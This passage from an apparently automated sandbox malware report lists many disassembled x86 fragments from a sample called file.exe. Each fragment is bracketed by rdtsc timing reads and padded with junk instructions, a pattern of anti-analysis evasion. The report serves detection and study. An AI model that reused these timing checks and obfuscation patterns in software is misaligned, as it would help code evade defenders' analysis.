                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050730 second address: 5050736 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050736 second address: 505073A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 505073A second address: 50507C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor eax, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c mov esi, ebx 0x0000000e pushfd 0x0000000f jmp 00007FB6CC860F35h 0x00000014 or cl, 00000026h 0x00000017 jmp 00007FB6CC860F31h 0x0000001c popfd 0x0000001d popad 0x0000001e and ecx, 1Fh 0x00000021 jmp 00007FB6CC860F2Eh 0x00000026 ror eax, cl 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b call 00007FB6CC860F2Dh 0x00000030 pop ecx 0x00000031 pushfd 0x00000032 jmp 00007FB6CC860F31h 0x00000037 adc ax, B3E6h 0x0000003c jmp 00007FB6CC860F31h 0x00000041 popfd 0x00000042 popad 0x00000043 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50507C2 second address: 50507C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50507C8 second address: 50507CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50507CC second address: 5050837 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 jmp 00007FB6CD9254FFh 0x0000000e retn 0004h 0x00000011 nop 0x00000012 mov esi, eax 0x00000014 lea eax, dword ptr [ebp-08h] 0x00000017 xor esi, dword ptr [00F92014h] 0x0000001d push eax 0x0000001e push eax 0x0000001f push eax 0x00000020 lea eax, dword ptr [ebp-10h] 0x00000023 push eax 0x00000024 call 00007FB6D1A25C1Dh 0x00000029 push FFFFFFFEh 0x0000002b jmp 00007FB6CD925506h 0x00000030 pop eax 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 pushad 0x00000035 popad 0x00000036 pushfd 0x00000037 jmp 00007FB6CD925503h 0x0000003c or al, 0000002Eh 0x0000003f jmp 00007FB6CD925509h 0x00000044 popfd 0x00000045 popad 0x00000046 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050837 second address: 5050847 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6CC860F2Ch 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050847 second address: 505084B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 505084B second address: 5050897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ret 0x00000009 nop 0x0000000a push eax 0x0000000b call 00007FB6D09616B3h 0x00000010 mov edi, edi 0x00000012 jmp 00007FB6CC860F37h 0x00000017 xchg eax, ebp 0x00000018 jmp 00007FB6CC860F36h 0x0000001d push eax 0x0000001e jmp 00007FB6CC860F2Bh 0x00000023 xchg eax, ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5050897 second address: 505089D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 505089D second address: 50508A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50508A3 second address: 50508A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50508A7 second address: 50508DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CC860F34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB6CC860F37h 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50001CF second address: 5000208 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 movzx ecx, di 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FB6CD925502h 0x00000012 xchg eax, esi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FB6CD925507h 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5000208 second address: 500020E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 500020E second address: 5000212 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5000212 second address: 5000216 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5000216 second address: 5000290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c mov ax, bx 0x0000000f mov esi, ebx 0x00000011 popad 0x00000012 push esi 0x00000013 jmp 00007FB6CD925500h 0x00000018 mov dword ptr [esp], edi 0x0000001b pushad 0x0000001c push eax 0x0000001d pop esi 0x0000001e jmp 00007FB6CD925509h 0x00000023 popad 0x00000024 test esi, esi 0x00000026 pushad 0x00000027 mov esi, 4FFB7D03h 0x0000002c push eax 0x0000002d push edx 0x0000002e pushfd 0x0000002f jmp 00007FB6CD925506h 0x00000034 jmp 00007FB6CD925505h 0x00000039 popfd 0x0000003a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5000290 second address: 50002C4 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FB6CC860F30h 0x00000008 or ecx, 44413528h 0x0000000e jmp 00007FB6CC860F2Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 je 00007FB73E78F283h 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50002C4 second address: 50002C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50002C8 second address: 50002E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CC860F37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50002E3 second address: 5000394 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB6CD9254FFh 0x00000009 adc cl, FFFFFFCEh 0x0000000c jmp 00007FB6CD925509h 0x00000011 popfd 0x00000012 movzx esi, dx 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001f jmp 00007FB6CD925503h 0x00000024 je 00007FB73F8537EEh 0x0000002a jmp 00007FB6CD925506h 0x0000002f mov edx, dword ptr [esi+44h] 0x00000032 jmp 00007FB6CD925500h 0x00000037 or edx, dword ptr [ebp+0Ch] 0x0000003a jmp 00007FB6CD925500h 0x0000003f test edx, 61000000h 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007FB6CD925507h 0x0000004c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5000394 second address: 500039A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0795 second address: 4FF07FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB6CD925507h 0x00000009 xor ah, 0000006Eh 0x0000000c jmp 00007FB6CD925509h 0x00000011 popfd 0x00000012 mov ch, 59h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b pushfd 0x0000001c jmp 00007FB6CD925506h 0x00000021 sub si, 8B18h 0x00000026 jmp 00007FB6CD9254FBh 0x0000002b popfd 0x0000002c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF07FE second address: 4FF0802 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0802 second address: 4FF086E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 call 00007FB6CD925504h 0x0000000c pop eax 0x0000000d popad 0x0000000e popad 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 call 00007FB6CD925503h 0x00000016 pushad 0x00000017 popad 0x00000018 pop esi 0x00000019 mov ecx, ebx 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e pushad 0x0000001f pushad 0x00000020 mov edx, 40E601F0h 0x00000025 mov bx, 4D1Ch 0x00000029 popad 0x0000002a mov di, 1F08h 0x0000002e popad 0x0000002f and esp, FFFFFFF8h 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FB6CD925509h 0x0000003b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF086E second address: 4FF0874 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0874 second address: 4FF087C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, cx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF087C second address: 4FF08E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebx 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007FB6CC860F30h 0x0000000f adc eax, 5C9413C8h 0x00000015 jmp 00007FB6CC860F2Bh 0x0000001a popfd 0x0000001b popad 0x0000001c push eax 0x0000001d jmp 00007FB6CC860F34h 0x00000022 xchg eax, ebx 0x00000023 pushad 0x00000024 mov cx, 1E7Dh 0x00000028 pushfd 0x00000029 jmp 00007FB6CC860F2Ah 0x0000002e sub si, 5958h 0x00000033 jmp 00007FB6CC860F2Bh 0x00000038 popfd 0x00000039 popad 0x0000003a xchg eax, esi 0x0000003b push eax 0x0000003c push edx 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF08E8 second address: 4FF08EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF08EC second address: 4FF08F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF08F2 second address: 4FF0920 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB6CD925508h 0x00000008 mov di, cx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FB6CD9254FAh 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0920 second address: 4FF0926 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0926 second address: 4FF092A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF092A second address: 4FF092E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF092E second address: 4FF097E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a mov edi, 1F6C733Ah 0x0000000f popad 0x00000010 mov esi, dword ptr [ebp+08h] 0x00000013 jmp 00007FB6CD9254FCh 0x00000018 sub ebx, ebx 0x0000001a jmp 00007FB6CD925501h 0x0000001f test esi, esi 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FB6CD925508h 0x0000002a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF097E second address: 4FF0984 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0984 second address: 4FF098A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0AA4 second address: 4FF0B0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CC860F32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c jmp 00007FB6CC860F30h 0x00000011 xchg eax, ebx 0x00000012 jmp 00007FB6CC860F30h 0x00000017 push eax 0x00000018 pushad 0x00000019 mov eax, edi 0x0000001b pushfd 0x0000001c jmp 00007FB6CC860F2Dh 0x00000021 sbb ecx, 38161026h 0x00000027 jmp 00007FB6CC860F31h 0x0000002c popfd 0x0000002d popad 0x0000002e xchg eax, ebx 0x0000002f pushad 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0B0E second address: 4FF0B3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bx, ax 0x00000007 popad 0x00000008 popad 0x00000009 push ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d mov di, 476Ah 0x00000011 popad 0x00000012 mov dword ptr [esp], ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FB6CD925503h 0x0000001e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0B3A second address: 4FF0B40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0B40 second address: 4FF0B4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6CD9254FBh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0B4F second address: 4FF0B53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0B53 second address: 4FF0B72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+14h] 0x0000000b pushad 0x0000000c movsx ebx, si 0x0000000f mov edi, eax 0x00000011 popad 0x00000012 push dword ptr [ebp+10h] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 mov cx, bx 0x0000001b movsx edi, si 0x0000001e popad 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0B72 second address: 4FF0B8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6CC860F34h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0B9D second address: 4FF0BA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4FF0BA1 second address: 4FF0BA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5000CD5 second address: 5000CD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5000CD9 second address: 5000CDD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5000CDD second address: 5000CE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5000CE3 second address: 5000D68 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB6CC860F35h 0x00000009 xor cx, 1166h 0x0000000e jmp 00007FB6CC860F31h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007FB6CC860F30h 0x0000001a and cl, 00000008h 0x0000001d jmp 00007FB6CC860F2Bh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 xchg eax, ebp 0x00000027 jmp 00007FB6CC860F36h 0x0000002c mov ebp, esp 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007FB6CC860F37h 0x00000035 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5000D68 second address: 5000D90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CD925509h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov di, 540Eh 0x00000011 push ebx 0x00000012 pop esi 0x00000013 popad 0x00000014 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5000A70 second address: 5000AD1 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FB6CC860F32h 0x00000008 jmp 00007FB6CC860F35h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 jmp 00007FB6CC860F2Eh 0x00000017 push eax 0x00000018 jmp 00007FB6CC860F2Bh 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FB6CC860F35h 0x00000025 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50805C5 second address: 50805E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 call 00007FB6CD925505h 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50805E8 second address: 5080660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FB6CC860F2Fh 0x0000000a or ch, 0000004Eh 0x0000000d jmp 00007FB6CC860F39h 0x00000012 popfd 0x00000013 popad 0x00000014 popad 0x00000015 xchg eax, ebp 0x00000016 pushad 0x00000017 mov al, 0Ah 0x00000019 pushfd 0x0000001a jmp 00007FB6CC860F39h 0x0000001f and ch, 00000036h 0x00000022 jmp 00007FB6CC860F31h 0x00000027 popfd 0x00000028 popad 0x00000029 mov ebp, esp 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FB6CC860F2Dh 0x00000032 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50708F0 second address: 50708F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50708F4 second address: 50708FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50708FA second address: 5070923 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CD9254FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FB6CD925507h 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070923 second address: 5070947 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CC860F39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070947 second address: 507094B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507094B second address: 507095E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CC860F2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 507080D second address: 5070813 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5010153 second address: 50101BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB6CC860F31h 0x00000009 or ch, FFFFFFB6h 0x0000000c jmp 00007FB6CC860F31h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 jmp 00007FB6CC860F2Ch 0x0000001b xchg eax, ebp 0x0000001c pushad 0x0000001d call 00007FB6CC860F2Eh 0x00000022 mov dl, cl 0x00000024 pop edi 0x00000025 popad 0x00000026 mov ebp, esp 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FB6CC860F35h 0x0000002f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50101BA second address: 50101C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50101C0 second address: 50101D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c mov di, 33D6h 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070AB9 second address: 5070B01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 56317FEFh 0x00000008 mov cx, 2C0Bh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 mov dx, cx 0x00000014 pushad 0x00000015 jmp 00007FB6CD925506h 0x0000001a mov cx, D7E1h 0x0000001e popad 0x0000001f popad 0x00000020 mov ebp, esp 0x00000022 jmp 00007FB6CD9254FCh 0x00000027 push dword ptr [ebp+0Ch] 0x0000002a pushad 0x0000002b push eax 0x0000002c push edx 0x0000002d movzx eax, di 0x00000030 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070B01 second address: 5070B0C instructions: 0x00000000 rdtsc 0x00000002 mov cl, dh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 movzx eax, dx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070B0C second address: 5070B55 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FB6CD9254FDh 0x00000008 or ax, F116h 0x0000000d jmp 00007FB6CD925501h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 push dword ptr [ebp+08h] 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007FB6CD925508h 0x00000022 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070B55 second address: 5070B59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070B59 second address: 5070B5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5070B5F second address: 5070BC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB6CC860F2Ch 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push 4668BBF3h 0x00000012 pushad 0x00000013 mov ax, bx 0x00000016 pushfd 0x00000017 jmp 00007FB6CC860F39h 0x0000001c adc eax, 426CC536h 0x00000022 jmp 00007FB6CC860F31h 0x00000027 popfd 0x00000028 popad 0x00000029 xor dword ptr [esp], 4669BBF1h 0x00000030 push eax 0x00000031 push edx 0x00000032 jmp 00007FB6CC860F2Dh 0x00000037 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50206C7 second address: 50206F4 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov edi, 2816BD76h 0x00000010 pushad 0x00000011 mov bh, ah 0x00000013 popad 0x00000014 popad 0x00000015 push FFFFFFFEh 0x00000017 jmp 00007FB6CD9254FBh 0x0000001c push 486CDA5Fh 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50206F4 second address: 50206F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 50206F8 second address: 5020708 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CD9254FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
